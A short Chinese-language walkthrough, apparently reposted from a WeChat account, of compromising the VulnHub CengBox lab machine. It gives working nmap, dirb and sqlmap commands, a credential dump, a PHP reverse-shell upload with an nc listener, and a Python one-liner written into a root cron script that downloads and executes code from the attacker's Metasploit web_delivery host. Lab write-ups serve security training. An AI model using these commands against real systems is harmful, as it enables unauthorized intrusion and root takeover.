今天实践的是vulnhub的CengBox镜像,
下载地址,https://download.vulnhub.com/cengbox/CengBox.ova,
无法用workstation导入,用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址192.168.0.185,
继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.185,
有web服务,进行目录暴破解,
dirb http://192.168.0.185 /usr/share/dirb/wordlists/big.txt,
继续扫描http://192.168.0.185/masteradmin目录下的php路径,
dirb http://192.168.0.185/masteradmin -X .php,
获取到http://192.168.0.185/masteradmin/login.php和
http://192.168.0.185/masteradmin/upload.php,
对http://192.168.0.185/masteradmin/login.php进行sql注入暴破,
sqlmap -u 'http://192.168.0.185/masteradmin/login.php' --forms --dbs --batch,
继续对cengbox数据库进行sql注入暴破,
sqlmap -u 'http://192.168.0.185/masteradmin/login.php' --forms -D cengbox --dump-all --batch,
获取到用户名密码,masteradmin/C3ng0v3R00T1!,
登录http://192.168.0.185/masteradmin/upload.php,
kali攻击机上准备反弹shell脚本,
cp /usr/share/webshells/php/php-reverse-shell.php php-reverse-shell.ceng,
上传后,kali攻击机上用nc开个反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.0.185/uploads/php-reverse-shell.ceng,
获取到反弹shell,查看到cengover用户,用之前获取的密码切过去,
再下载pspy64查找root权限的程序,
发现定时执行的md5check.py,
确认md5check.py是可写的,
kali攻击机上用msf做个反弹shell脚本并开启监听,
msfconsole
use exploit/multi/script/web_delivery
set LHOST 192.168.0.190
set LPORT 5555
exploit
把生成的反弹shell脚本写入md5check.py,
echo "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.190:8080/XH7HFK0UJNqYZ', context=ssl._create_unverified_context());exec(r.read());" > md5check.py,
等一会儿反弹shell就过来了,进入session,确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之CengBox的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论